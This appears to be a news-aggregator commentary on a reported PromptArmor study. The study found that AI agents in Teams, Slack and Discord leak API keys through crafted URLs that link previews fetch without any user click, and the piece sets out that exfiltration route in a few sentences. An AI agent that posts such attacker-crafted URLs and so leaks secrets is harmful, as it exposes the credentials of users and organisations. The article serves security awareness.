On February 10, 2026, The Register reported that security firm PromptArmor found AI agents embedded in messaging apps can leak sensitive data through malicious URLs that get auto-fetched for link previews. The study showed platforms like Microsoft Teams, Slack and Discord, combined with various AI agents, can exfiltrate API keys and other secrets without any user clicks.
This article aggregates reporting from 1 news source. The TL;DR is AI-generated from original reporting. Race to AGI's analysis provides editorial context on implications for AGI development.
This story is a reminder that as we move from chatbots to fully agentic systems, the attack surface explodes in unexpected ways. Here, the AI itself isn’t ‘hacked’ in a traditional sense; the mere act of an agent posting a maliciously crafted URL into a Slack or Teams channel is enough to cause secrets to leak via link previews, with zero user interaction. That’s exactly the kind of brittle emergent behavior you see when you wire LLM agents into legacy systems that were never designed with them in mind.([theregister.com](https://www.theregister.com/2026/02/10/ai_agents_messaging_apps_data_leak/))
Strategically, this creates friction for the emerging vision of “agents that do work for you” inside enterprise messaging. If CISOs conclude that every agent integration silently circumvents network and data loss controls, they will throttle deployments or demand much heavier sandboxing and policy engines. That doesn’t stop AGI research, but it slows the operationalization of agentic systems in high‑value corporate environments.
Longer term, this kind of exploit will push infra vendors and AI platforms toward explicit “LLM‑safe” modes—agent‑aware link preview APIs, stricter URL sanitization, and richer policy languages about where agents can send which data. The labs that want their agents to be trusted co‑workers, not unintentional exfiltration bots, will have to absorb this security mindset into their product roadmaps.


